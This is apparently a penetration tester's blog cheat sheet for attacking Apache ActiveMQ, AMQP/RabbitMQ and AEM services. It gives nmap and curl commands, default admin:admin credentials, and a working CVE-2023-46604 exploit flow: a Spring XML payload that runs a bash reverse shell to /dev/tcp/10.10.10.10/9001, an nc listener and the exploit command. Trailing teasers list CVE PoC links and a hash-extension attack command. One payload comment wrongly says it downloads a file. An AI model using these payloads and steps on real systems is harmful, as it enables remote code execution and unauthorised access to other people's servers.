Skip to main content

ActiveMQ OpenWire Transport Pentest

 

#Commonly Observed on 
Ports - 32064, 32357, 61616l 

you will find it together with RMI (1099 Port) & a webserver (6161 - jetty)
Nmap Scan 

nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10
Web server -- http://10.10.10.10:8161/admin -> default creds- admin:admin

#Query the server 
curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA" 

curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue

Connecting to ActiveMQ (Might require creds)

#Download activemq from here
unzip filename

go to conf/activemq-cli.config --> and update the IP Address

broker {
        local {
            amqurl = "tcp://10.10.10.10:32064"
                jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi"
                username = ""
                password = ""
                prompt-color = "light-blue" // Possible values: "gray", "red", "light-red", "light-green", "green", "light-yellow", "yellow", "light-blue", "blue", "light-purple", "purple", "$
        }
}  

/bin/activemq
> connect --broker local
> send-message --body local --queue SendQueue
> queues
> list-messages -queue SendQueue

ActiveMQ Exploit - CVE-2023-46604 

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git

#Update poc-linux.xml as below 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <!-- The command below downloads the file and saves it as test.elf -->
            <value>bash -i &#x3E;&#x26; /dev/tcp/10.10.10.10/9001 0&#x3E;&#x26;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>


#Start a python web server 
python3 -m http.server 8001

#Start nc, get you rev shell here
nc -nvlp 9001

#Run the exploit 
go run main.go -i Target_ServerIP -u http://Attacher_host:8001/poc-linux.xml 

AMQP/ ActiveMQ  - 5671, 5672/tcp


Rabbitmq uses these ports - More Info Here

git clone https://github.com/QKaiser/cottontail 
pip3 install . 
python3 setup.py install 

cottontail 
or
cottontail/bin/cottontail -h

python3 cottontail --username guest --password guest -v https://10.10.10.10
AEM - Adobe Experience Manager

https://github.com/bl4de/security-tools/blob/master/aem-explorer.py 


Comments

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Hash Extension Attacks

  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512